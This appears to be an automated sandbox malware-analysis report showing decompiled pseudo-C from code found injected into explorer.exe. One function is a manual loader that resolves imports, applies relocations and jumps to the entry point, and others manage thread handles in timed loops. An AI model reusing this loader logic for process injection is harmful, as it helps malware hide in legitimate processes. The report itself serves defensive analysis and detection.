        0x00093009
        0x00093009
        0x0009300f
        0x00093012
        0x00093015
        0x00093017
        0x00093017
        0x00093018
        0x00093018
        0x00093023
        0x00093023
        0x00093023
        0x00093026
        0x00093029
        0x00093029
        0x0009302c
        0x0009302c
        0x00092fef
        0x0009302f
        0x00093032
        0x00093035
        0x00093037
        0x0009303a
        0x0009303c
        0x0009303f
        0x00093042
        0x00093044
        0x00093047
        0x0009304f
        0x00093057
        0x0009305a
        0x0009305a
        0x0009305a
        0x0009305d
        0x0009305d
        0x0009305d
        0x00093060
        0x00093066
        0x00093068
        0x00093068
        0x0009306e
        0x00093074
        0x0009307d
        0x00093084
        0x00093086
        0x00093089
        0x00093089
        0x0009308c
        0x0009308c
        0x0009308f
        0x00093091
        0x00093094
        0x00093096
        0x000930b1
        0x000930b1
        0x000930b5
        0x000930b8
        0x000930bb
        0x000930be
        0x000930d4
        0x000930d4
        0x000930d4
        0x000930c0
        0x000930c0
        0x000930c2
        0x000930c6
        0x000930c9
        0x00000000
        0x000930cb
        0x000930cb
        0x000930cd
        0x00000000
        0x000930cf
        0x000930cf
        0x000930cf
        0x000930cd
        0x000930c9
        0x000930d8
        0x000930db
        0x000930e0
        0x000930ea
        0x000930ea
        0x000930ea
        0x000930ed
        0x00093098
        0x00093098
        0x0009309a
        0x000930a1
        0x000930a1
        0x000930a3
        0x000930a5
        0x000930a7
        0x000930ab
        0x000930ad
        0x000930af
        0x00000000
        0x00000000
        0x000930af
        0x000930ab
        0x0009309c
        0x0009309c
        0x0009309f
        0x00000000
        0x00000000
        0x0009309f
        0x0009309a
        0x000930f7
        0x000930f9
        0x000930f9
        0x00093104
        0x00092fa7
        0x00092fa7
        0x00092faa
        0x00000000
        0x00092fac
        0x00092fac
        0x00092fae
        0x00092fb2
        0x00000000
        0x00092fb4
        0x00092fb4
        0x00092fb4
        0x00092fb7
        0x00000000
        0x00092fbb
        0x00092fc4
        0x00092fc4
        0x00092fb7
        0x00092fb2
        0x00092faa
        0x00092f96
        0x00092f9f
        0x00092f9f

        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: memcpy
        • String ID:
        • API String ID: 3510742995-0
        • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
        • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00092AEC, Relevance: 6.2, APIs: 4, Instructions: 219libraryloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 52%
        			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}





























        0x00092afb
        0x00092b01
        0x00092b0a
        0x00092b0d
        0x00092b10
        0x00000000
        0x00092c01
        0x00092c05
        0x00092c07
        0x00092c15
        0x00092d33
        0x00092d3c
        0x00092d3f
        0x00092d43
        0x00092d49
        0x00092d51
        0x00092d51
        0x00092d59
        0x00000000
        0x00092d64
        0x00092c1b
        0x00092c24
        0x00092c32
        0x00092c35
        0x00092c52
        0x00092c59
        0x00092c6b
        0x00092c6b
        0x00092c72
        0x00092c82
        0x00092c9a
        0x00092c84
        0x00092c8c
        0x00092c8c
        0x00092c9d
        0x00092ca1
        0x00092cb1
        0x00092cd4
        0x00092ce6
        0x00092cb3
        0x00092cc7
        0x00092cc7
        0x00092cf0
        0x00092d0c
        0x00092cf2
        0x00092d01
        0x00092d01
        0x00092d14
        0x00092d1d
        0x00092d1d
        0x00092d2b
        0x00000000
        0x00092c74
        0x00092c76
        0x00000000
        0x00092c76
        0x00092c72
        0x00000000
        0x00092c35
        0x00092b18
        0x00092b26
        0x00092b2b
        0x00092b36
        0x00092b39
        0x00092b3d
        0x00092b3f
        0x00092b4f
        0x00092b58
        0x00092b61
        0x00092b69
        0x00092b72
        0x00092b7d
        0x00092b83
        0x00092b86
        0x00092b89
        0x00092b90
        0x00092b97
        0x00000000
        0x00000000
        0x00092ba2
        0x00092bb0
        0x00092bbb
        0x00092bc5
        0x00092bdd
        0x00092bea
        0x00092bea
        0x00092bc7
        0x00092bd2
        0x00092bd2
        0x00092bf1
        0x00092bf1
        0x00092bf9
        0x00092bf9
        0x00000000

        APIs
        • GetModuleHandleA.KERNEL32(?), ref: 00092C4C
        • LoadLibraryA.KERNEL32(?), ref: 00092C65
        • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
        • GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AddressProc$HandleLibraryLoadModule
        • String ID:
        • API String ID: 384173800-0
        • Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
        • Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
        • Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
        • Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00081C68, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
        Download Yara Rule
        C-Code - Quality: 75%
        			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x9e6dc; // 0x1e4
				_t13 = E0008A4BF(_t41, 0);
				while(_t13 < 0) {
					E0008980C( &_v28);
					_t43 =  *0x9e6e0; // 0x0
					_t15 =  *0x9e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x9e684; // 0x133f8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x9e684; // 0x133f8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x9e6dc; // 0x1e4
						__eflags = 0;
						_t13 = E0008A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x9e6e8; // 0x133fdb8
				_v28 = _t20;
				_t22 = E0008A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
					E0008980C(0x9e6e0);
					_t64 = E00081A1B( &_v28, E00081226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x9e760);
						_t51 = 0x27;
						E00089F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x9e684; // 0x133f8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
				_t48 =  *0x9e6dc; // 0x1e4
				 *0x9e6d0 = 0;
				E0008A4DB(_t48);
				E0008861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

























        0x00081c68
        0x00081c75
        0x00081c77
        0x00081c7e
        0x00081ce4
        0x00081c8b
        0x00081c90
        0x00081c96
        0x00081c9b
        0x00081ca1
        0x00081ca3
        0x00081ca7
        0x00081d15
        0x00081d17
        0x00081d99
        0x00081d9f
        0x00081d9f
        0x00081ca9
        0x00081cb1
        0x00081cb1
        0x00081cbd
        0x00081cc3
        0x00081cc5
        0x00000000
        0x00000000
        0x00081cc7
        0x00081cd1
        0x00081cd7
        0x00081cdd
        0x00081cdf
        0x00000000
        0x00081cdf
        0x00081cab
        0x00081caf
        0x00000000
        0x00000000
        0x00000000
        0x00081caf
        0x00081cee
        0x00081cef
        0x00081cf0
        0x00081cf1
        0x00081cf2
        0x00081cf7
        0x00081d01
        0x00081d06
        0x00081d0e
        0x00081d29
        0x00081d2c
        0x00081d36
        0x00081d41
        0x00081d54
        0x00081d56
        0x00081d58
        0x00081d5a
        0x00081d5b
        0x00081d63
        0x00081d64
        0x00081d6a
        0x00081d10
        0x00081d10
        0x00081d10
        0x00081d6b
        0x00081d76
        0x00081d79
        0x00081d7f
        0x00081d85
        0x00081d90
        0x00081d97
        0x00000000

        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 7af54bf47eeafca49fec7a466d95b770275a6c99f1a555b29a304e1941eb5a54
        • Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
        • Opcode Fuzzy Hash: 7af54bf47eeafca49fec7a466d95b770275a6c99f1a555b29a304e1941eb5a54
        • Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00081B2D, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
        Download Yara Rule
        C-Code - Quality: 73%
        			E00081B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x9e6f4; // 0x1e0
				_t12 = E0008A4BF(_t38, 0);
				while(_t12 < 0) {
					E0008980C( &_v28);
					_t40 =  *0x9e700; // 0x0
					_t14 =  *0x9e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x9e684; // 0x133f8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x9e684; // 0x133f8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x9e6f4; // 0x1e0
								__eflags = 0;
								_t12 = E0008A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E0008980C(0x9e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x9e6e8; // 0x133fdb8
				_v28 = _t24;
				_t61 = E00081A1B( &_v28, E0008131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x9e760);
					_t48 = 0x27;
					E00089F06(_t48);
				}
				if(_v24 != 0) {
					E00086890( &_v24);
				}
				_t26 =  *0x9e684; // 0x133f8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
				_t28 =  *0x9e758; // 0x0
				 *0x9e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x9e6f4; // 0x1e0
				 *0x9e758 =  !=  ? 1 : _t28;
				E0008A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}
























        0x00081b2d
        0x00081b33
        0x00081b41
        0x00081baf
        0x00081b4e
        0x00081b53
        0x00081b59
        0x00081b5e
        0x00081b64
        0x00081b66
        0x00081b6a
        0x00081c64
        0x00081c64
        0x00081b70
        0x00081b70
        0x00081b7c
        0x00081b7c
        0x00081b88
        0x00081b8e
        0x00081b90
        0x00000000
        0x00081b92
        0x00081b92
        0x00081b9c
        0x00081ba2
        0x00081ba8
        0x00081baa
        0x00000000
        0x00081baa
        0x00081b72
        0x00081b72
        0x00081b76
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00081b76
        0x00081b70
        0x00081c5d
        0x00081c63
        0x00081c63
        0x00081bb8
        0x00081bcc
        0x00081bcf
        0x00081bd9
        0x00081be5
        0x00081bef
        0x00081bf0
        0x00081bf1
        0x00081bf2
        0x00081bf7
        0x00081c00
        0x00081c04
        0x00081c06
        0x00081c07
        0x00081c0f
        0x00081c10
        0x00081c16
        0x00081c1b
        0x00081c21
        0x00081c21
        0x00081c26
        0x00081c31
        0x00081c34
        0x00081c3c
        0x00081c48
        0x00081c4b
        0x00081c51
        0x00081c56
        0x00081c5b
        0x00000000

        APIs
        • GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
        • GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
        • GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
        • DuplicateHandle.KERNEL32 ref: 00081BD9
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Current$Process$DuplicateHandleThread
        • String ID:
        • API String ID: 3566409357-0
        • Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
        • Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
        • Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
        • Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52
        Uniqueness

        Uniqueness Score: -1.00%